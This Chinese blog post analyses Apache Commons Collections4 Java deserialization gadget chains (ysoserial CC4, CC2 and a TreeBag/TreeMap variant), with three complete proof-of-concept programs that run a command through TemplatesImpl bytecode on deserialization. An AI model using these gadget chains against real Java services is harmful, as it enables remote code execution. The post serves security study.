Java 反序列化漏洞-Apache Commons Collections4-TreeBag攻击链

已于 2022-10-06 19:47:15 修改
阅读量1.3k 收藏
点赞数
分类专栏: Java 文章标签: 安全
于 2022-10-06 14:47:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/127178655
版权

Java 反序列化漏洞-Apache Commons Collections4-TreeBag攻击链

前言

知识点补充可以看看我前面写的CC2CC3
CC4这条链其实是CC2的变种,与CC2不同的是和CC3一样用了InstantiateTransformer而不是InvokerTransformer触发利用链,ysoserial中用 PriorityQueue 的 TransformingComparator 触发 ChainedTransformer,再利用 InstantiateTransformer 实例化 TemplatesImpl。但这条链有点套娃的感觉,没啥意思,这里补充一个对 PriorityQueue 的替代链 TreeBag。

ysoserial中的CC4

ysoserial中的CC4和CC2特别像,只是改成用了InstantiateTransformer而不是InvokerTransformer触发利用链。

PriorityQueue.readObject()
    TransformingComparator.compare()
        InvokerTransformer.transform()
            TemplatesImpl.newTransformer()

这是CC2的利用链

PriorityQueue.readObject()
    TransformingComparator.compare()
        ConstantTransformer.transform()
             InstantiateTransformer.transform()
                   TemplatesImpl.newTransformer()

这是CC4的利用链
从上面我们不难看出,还是可以看到两条链的细微差别,我们之前也说过,CC3产生的目的也就是使用InstantiateTransformer绕过⼀些规则对InvokerTransformer的限制,换而言之InstantiateTransformer可以等效替换InvokerTransformer。
于是乎我们在CC2的POC上做些修改即可得到CC4的POC

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class CC41 {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static void main(String[] args) throws Exception {
        ClassPool pool = ClassPool.getDefault();  // 获取javassist维护的类池
        CtClass cc = pool.makeClass("Test");  // 创建一个空类Test
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        cc.makeClassInitializer().insertBefore(cmd);  //insertBefore创建 static 代码块,并插入代码
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));  //setSuperclass更改父类
        byte[] bytes = cc.toBytecode();  //toBytecode()获取修改的字节码
        //byte[] bytes = Base64.decode("恶意类");
        TemplatesImpl templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_name", "xxxx");
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        //构造利用链
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[]{Templates.class},
                        new Object[]{templatesImpl})
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);
        TransformingComparator comparator = new TransformingComparator(chain);
        //触发利用链
        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(2);
        Field field2 = queue.getClass().getDeclaredField("comparator");
        field2.setAccessible(true);
        field2.set(queue, comparator);
        Field field3 = queue.getClass().getDeclaredField("queue");
        field3.setAccessible(true);
        field3.set(queue, new Object[]{templatesImpl, templatesImpl});
        //序列化  -->  反序列化
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        ois.readObject();
    }
}

贴上CC2的POC可以对比一下

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class CC2{
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static void main(String[] args) throws Exception{

        ClassPool pool = ClassPool.getDefault();  // 获取javassist维护的类池
        CtClass cc = pool.makeClass("Test");  // 创建一个空类Test
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        cc.makeClassInitializer().insertBefore(cmd);  //insertBefore创建 static 代码块,并插入代码
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));  //setSuperclass更改父类
        byte[] bytes = cc.toBytecode();  //toBytecode()获取修改的字节码
        //byte[] bytes = Base64.decode("恶意类");
        TemplatesImpl templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_name", "xxxx");
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});

        InvokerTransformer transformer = new InvokerTransformer("newTransformer", new Class[0], new Object[0]);


        TransformingComparator comparator =  new TransformingComparator(transformer);

        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(2);
        Field field2 = queue.getClass().getDeclaredField("comparator");
        field2.setAccessible(true);
        field2.set(queue, comparator);
        Field field3 = queue.getClass().getDeclaredField("queue");
        field3.setAccessible(true);
        field3.set(queue, new Object[]{templatesImpl, templatesImpl});
        //序列化  -->  反序列化
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        ois.readObject();

    }

}

使用TreeBag的CC4

ysoserial中的CC4还是利用了优先级队列 PriorityQueue 反序列化时会调用 comparator 的 compare 方法的特性,配合 TransformingComparator 触发 transformer。
那么除了 PriorityQueue,还能否找到其他的提供排序的类,在反序列化时会调用到比较器呢?于是找到了 TreeBag。
Bag 接口继承自 Collection 接口,定义了一个集合,该集合会记录对象在集合中出现的次数。它有一个子接口 SortedBag,定义了一种可以对其唯一不重复成员排序的 Bag 类型。

TreeBag 是对 SortedBag 的一个标准实现。TreeBag 使用 TreeMap 来储存数据,并使用指定 Comparator 来进行排序。

TreeBag 继承自 AbstractMapBag,实现了 SortedBag 接口。初始化 TreeBag 时,会创建一个新的 TreeMap 储存在成员变量 map 里,而排序使用的 Comparator 则直接储存在 TreeMap 中。

TreeBag.readObject

在TreeBag 反序列化时,会将反序列化出来的 Comparator 对象交给 TreeMap 实例化,并调用父类的 doReadObject 方法处理:
在这里插入图片描述

AbstractMapBag.doReadObject

而doReadObject 方法会向 TreeMap 中 put 数据
在这里插入图片描述

TreeMap.put

而TreeMap在put数据时会用compare进行排序
在这里插入图片描述

TreeMap.compare

compare 方法中调用了 comparator 进行比较,那我们就可以接上使用 TransformingComparator 触发后续的逻辑。
在这里插入图片描述

TreeMap

我们回头看看TreeMap的构造函数发现comparator 可控,那POC很容易就可以得到了
在这里插入图片描述

POC

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.bag.TreeBag;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import java.io.*;
import java.lang.reflect.Field;

public class CC42 {

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {

        ClassPool pool = ClassPool.getDefault();  // 获取javassist维护的类池
        CtClass cc = pool.makeClass("Test");  // 创建一个空类Test
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        cc.makeClassInitializer().insertBefore(cmd);  //insertBefore创建 static 代码块,并插入代码
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));  //setSuperclass更改父类
        byte[] bytes = cc.toBytecode();  //toBytecode()获取修改的字节码
        //byte[] bytes = Base64.decode("恶意类");
        TemplatesImpl templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_name", "xxxx");
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        //构造利用链

        Transformer            transformer = new InvokerTransformer("toString", new Class[]{}, new Object[]{});
        TransformingComparator comparator  = new TransformingComparator(transformer);

        // prepare CommonsCollections object entry point
        TreeBag tree = new TreeBag(comparator);
        tree.add(templatesImpl);

        Field field = InvokerTransformer.class.getDeclaredField("iMethodName");
        field.setAccessible(true);
        field.set(transformer, "newTransformer");

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(tree);
        oos.close();
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        ois.readObject();
    }
}

调用链

TreeBag.readObject()
   AbstractMapBag.doReadObject()
        TreeMap.put()
            TreeMap.compare()
                TransformingComparator.compare()
                        InvokerTransformer.transform()

参考文章
https://su18.org/post/ysoserial-su18-2/#treebag-treemap

lmonstergg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java序列漏洞(Apache Commons Collections
m0_61506558的博客
08-08 782
CC对JDK标准库的集合类进行了扩展,添加了一些数据结构,并且提供了工具类2015年1月28日,有两个黑客发现了CC的漏洞利用链2.2 源码分析transform()方法可以通过射机制来进行任意函数的调用通过链式调用,实现InvokeTransformer方法的自动触发1、对利用类进行序列,然后交给Java程序序列2、在进行序列时,会执行方法,该方法会用setValue对成员变量的Value值进行修改3、value修改触发了。......
JAVA 序列之 Apache Commons Collections 序列漏洞分析
最新发布
辛勤搬砖的门卫的专栏
03-01 1900
Apache Commons Collections 序列漏洞研究
Java安全研究——序列漏洞之CC链
weixin_43889136的博客
04-13 4070
0x01前言 apachecommons-collections组件下的序列漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc链的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03序列漏洞 序列是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
Java安全--CC4
qq_64201116的博客
12-16 701
而且最关键的是这里它还执行了break方法,所以下面的serialize是压根没有执行,所以连ser.bin的序列文件都没有生成,怎么序列呢?接着在序列之前,add函数之后利用射修改其值改回chainedTransformer,这样在序列的时候就可以执行了。为什么我们CC3前面半条不能用这个链子,或者有CC3不就足够了,为什么要再找一个这样的链子,不是画蛇添足吗?我们发现这个判断的时候就被阻隔了,size就是值队列内的数量,因为我们没有添加过任何元素所以这里默认就是0。
Apache Commons-Collections4工具类使用(Map、List、Set集合全覆盖)集合开发工具大利器
竹林幽深
08-22 1751
开发中我们常常会遇到对集合的操作,使用这个类库能简你的代码,从而提高你的工作效率,让你从大量的底层代码中抽身。工欲善其事必先利其器,希望我介绍以后大家在开发中多多去使用这些工具类,让它们成为你在开发中的大利器。extends O> b):两个集合的连接,类似于ORACLE数据库union all的功能。CollectionUtils:集合操作的工具类,开发中会常常的使用。xiaozhang ,公众号:程序员xiaozhang。如下是它的包结构,里面有很多好用的工具类。收录于合集#Java27个。
Java序列漏洞利用工具的实现共5页.pdf.zip
11-23
例如,Apache Commons Collections库曾被发现存在一个著名的序列漏洞攻击者可以通过构造特定的输入来执行任意代码。这种情况下,利用工具可以帮助复现攻击链,以验证系统的脆弱性。 在实际应用中,防御Java...
commons-collections4-4.1
11-01
在这个"commons-collections4-4.1"版本中,主要关注的是修复一个重要的安全问题——Java序列漏洞Java序列漏洞通常发生在处理从网络接收或从持久存储中读取的序列对象时。当恶意构造的序列数据被...
weblogic10.3.6补丁(java序列漏洞更新步骤).docx
09-10
近日,Apache Commons Collections 等公共库被发现存在 Java 序列漏洞,WebLogic、WebSphere、JBoss、Jenkins、OpenNMS 等主流中间件和框架均受到影响,攻击者利用该漏洞可以远程执行操作系统命令,入侵应用系统...
commons-collections-3.2.2-
11-01
这个"commons-collections-3.2.2-"版本是该库的一个特定发行版,主要用于解决WebLogic服务器上的序列漏洞问题。 在Java编程中,集合框架是处理对象数组的重要组成部分。Apache Commons Collections扩展了Java...
信息安全技术:Java序列漏洞.pptx
11-01
在2015年1月28日,Gabriel Lawrence和Chris Frohoff在AppSecCali会议上展示了如何利用Apache Commons Collections库来实现Java序列漏洞的任意代码执行。然而,这个发现并未立即引起广泛注意,直到同年11月,...
史上最全!通往BAT必备法宝,内容太过真实
m0_56067448的博客
03-17 375
接口概述: 接口是Java语言中的一种引用类型,是方法的"集合",所以接口的内部主要就是定义方法,包含常量,抽象方法(JDK 7及以前),额外增加默认方法和静态方法(JDK 8),额外增加私有方法(jdk9)。 接口的定义,它与定义类方式相似,但是使用 interface 关键字。它也会被编译成.class文件,但一定要明确它并不是类,而是另外一种引用数据类型。 public class 类名.java–>.class public interface 接口名.java–>.class 接口的使
利用TemplatesImpl加载字节码
Thunderclap的博客
02-06 391
调用了 TemplatesImpl#newTransformer() 并且它也是 public 类型的,如下也成功触发。TemplatesImpl 类中已经没有调用 getTransletClasses() 的方法了,而 getTransletInstance() 方法在。com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 这个类中定义了一个内部类。Java中默认情况下,如果一个。方法中被调用了,所以构造如下链,P牛用的就是如下的链。
Java集合-treebag
weixin_30814223的博客
01-22 269
import org.apache.commons.collections4.Bag; import org.apache.commons.collections4.bag.TreeBag; import java.util.Arrays; public class ApacheTreeBag { public static void main(String[] a...
commons-collections使用介绍之Bag
weixin_34248023的博客
04-05 258
commons-collections中为我们提供了一些关于集合的实现,今天为大家介绍一下Bag相关类的用法。 概述 Bag继承自Collection接口,定义了一个集合,该集合会记录对象在集合中出现的次数。 假设你有一个包,包含{a, a, b, c}。调用getCount(a)方法将返回2,调用uniqueset()方法...
R语言之-caret包应用
热门推荐
jiabiao1602的专栏
04-10 4万+
因原文可能要翻墙才能阅读,故转来此地,希望对想研究caret包的童靴有帮助。 caret包应用之一:数据预处理:http://xccds1977.blogspot.hk/2011/09/caret.html caret包应用之一:数据预处理 在进行数据挖掘时,我们会用到R中的很多扩展包,各自有不同的函数和功能。如果能将它们综合起来应用就会很方便。caret包(Clas
TreeSet和TreeMap调用compareTo的简单测试
流年梦呓语的博客
07-17 654
TreeSet和TreeMap调用compareTo的简单测试重写equals和compareTo源代码输出结果结论 重写equals和compareTo 源代码 import java.util.*; class A implements Comparable<Object> { String str; int count; public A(String str) { ...
TreeMap集合遇到序列的这个坑
keffe的博客
06-17 1099
TreeMap的定制排序,该Compatator也要继承序列. 解决方式:重新定义一个类去实现定制排序和序列,再放入TreeMap中
TreeSet自定义Comparator后序列序列问题
Solidfish的专栏
08-17 4784
碰到一个比较郁闷的问题,在TreeSet中定义了一个Comparator之后出现了序列对象失败的问题。有兴趣可以尝试一下。 最后Google了一下发现这是一个bug,或者其实也算不上bug,具体可以参考http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=4330877 问题: If java.util.TreeMap customer cr

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值